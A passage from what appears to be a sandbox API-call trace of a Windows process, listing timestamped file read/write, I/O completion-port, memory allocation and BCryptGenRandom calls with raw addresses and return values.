lpOverlapped=0x336fc18) returned 1 [0079.622] WriteFile (in: hFile=0x3bc, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0xdd0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0079.624] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0079.638] WriteFile (in: hFile=0x3ac, lpBuffer=0x3d7007c, nNumberOfBytesToWrite=0xe00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 0x0 [0079.638] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0079.656] WriteFile (in: hFile=0x3a0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0xe10, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0079.657] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0079.668] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.669] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.669] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0079.669] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.670] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.670] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0079.670] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0079.670] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0079.670] free (_Block=0x77d800) [0079.670] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0079.670] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0079.670] free (_Block=0x1ff1930) [0079.670] free (_Block=0x1ff1a40) [0079.671] free (_Block=0x77d908) [0079.671] WriteFile (in: hFile=0x3bc, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x611, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0079.671] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0079.682] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.683] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.683] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0079.683] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.683] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.683] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0079.684] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0079.684] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0079.684] free (_Block=0x77d800) [0079.684] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0079.684] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0079.684] free (_Block=0x1ff1930) [0079.684] free (_Block=0x1ff1a40) [0079.684] free (_Block=0x77d908) [0079.684] WriteFile (in: hFile=0x3ac, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0079.685] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0079.698] CloseHandle (hObject=0x3bc) returned 1 [0079.699] free (_Block=0x1fb18c0) [0079.699] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0079.704] ReadFile (in: hFile=0x3a0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xc2f0, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0079.707] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0080.122] CloseHandle (hObject=0x3c0) returned 1 [0080.124] free (_Block=0x3df0008) [0080.124] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0080.139] CloseHandle (hObject=0x3c4) returned 1 [0080.140] free (_Block=0x1fb18c0) [0080.140] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0080.147] WriteFile (in: hFile=0x3a0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x13d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0080.147] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0080.149] WriteFile (in: hFile=0x3b4, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x6aa0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0080.149] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0080.150] WriteFile (in: hFile=0x3ac, lpBuffer=0x2031f04*, nNumberOfBytesToWrite=0x13d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2031ed0 | out: lpBuffer=0x2031f04*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2031ed0) returned 1 [0080.150] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0080.164] ReadFile (in: hFile=0x3c0, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xf26, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0080.165] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0080.165] CloseHandle (hObject=0x3c0) returned 1 [0080.332] free (_Block=0x3df0008) [0080.332] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0080.341] CloseHandle (hObject=0x3a0) returned 1 [0080.342] free (_Block=0x3d70048) [0080.342] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0080.351] ReadFile (in: hFile=0x3a0, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0xb04, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0080.351] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0080.352] CloseHandle (hObject=0x3a0) returned 1 [0080.364] free (_Block=0x1fb18c0) [0080.364] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0080.377] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.377] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.377] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0080.377] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.378] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.378] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0080.378] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0080.378] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0080.378] free (_Block=0x1ff1e60) [0080.378] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0080.378] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0080.379] free (_Block=0x1ff1e60) [0080.379] free (_Block=0x1ff1930) [0080.379] free (_Block=0x77d800) [0080.379] WriteFile (in: hFile=0x3a0, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0080.379] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0080.380] WriteFile (in: hFile=0x3a0, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x13e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0080.381] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0080.418] ReadFile (in: hFile=0x3a0, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0xc3a, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0080.419] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0080.426] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.426] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.427] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0080.427] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.427] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.427] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0080.427] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0080.427] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0080.427] free (_Block=0x1ff1e60) [0080.427] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0080.427] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0080.428] free (_Block=0x1ff1e60) [0080.428] free (_Block=0x1ff1930) [0080.428] free (_Block=0x77d800) [0080.428] WriteFile (in: hFile=0x3ac, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x61f, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0080.428] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0080.450] WriteFile (in: hFile=0x3ac, lpBuffer=0x3d7007c, nNumberOfBytesToWrite=0x13b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 0x0 [0080.450] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0080.457] WriteFile (in: hFile=0x3c0, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xc30, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0080.457] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0080.466] ReadFile (in: hFile=0x3a0, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x135b, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0080.477] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0080.484] ReadFile (in: hFile=0x3ac, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0xc09, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 0x0 [0080.485] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0080.493] ReadFile (in: hFile=0x3c0, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x5fc8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0080.512] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0080.526] ReadFile (in: hFile=0x3a0, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x11da, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0080.544] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0080.550] ReadFile (in: hFile=0x3c4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xb05, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0080.551] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0080.650] CloseHandle (hObject=0x3c4) returned 1 [0080.651] free (_Block=0x1fb18c0) [0080.651] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0080.658] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.658] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.658] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0080.658] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.659] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.659] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0080.659] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0080.659] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0080.659] free (_Block=0x77d800) [0080.659] calloc (_Count=0x41, _Size=0x4) returned 0x2031ed0 [0080.659] calloc (_Count=0x82, _Size=0x4) returned 0x2031fe0 [0080.660] free (_Block=0x2031ed0) [0080.660] free (_Block=0x2031fe0) [0080.660] free (_Block=0x77d908) [0080.660] WriteFile (in: hFile=0x3c0, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0080.660] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0080.666] WriteFile (in: hFile=0x3a0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x1240, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0080.666] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0080.705] WriteFile (in: hFile=0x3c0, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x67a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0080.706] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0080.719] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x13e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0080.719] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0080.731] WriteFile (in: hFile=0x3a0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0xc40, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0080.732] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0080.738] ReadFile (in: hFile=0x3c0, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x13a1, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0080.739] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0080.739] CloseHandle (hObject=0x3c0) returned 1 [0080.740] free (_Block=0x3d70048) [0080.740] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0080.842] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.843] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.843] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0080.843] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.843] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.843] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0080.844] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0080.844] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0080.844] free (_Block=0x77d800) [0080.844] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0080.844] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0080.844] free (_Block=0x1ff1930) [0080.844] free (_Block=0x1ff1a40) [0080.844] free (_Block=0x77d908) [0080.844] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0080.845] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0080.858] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0xc30, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0080.858] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0080.867] ReadFile (in: hFile=0x3c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x135b, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0080.878] GetQueuedCompletionStatus (in: CompletionPort=0x14c, 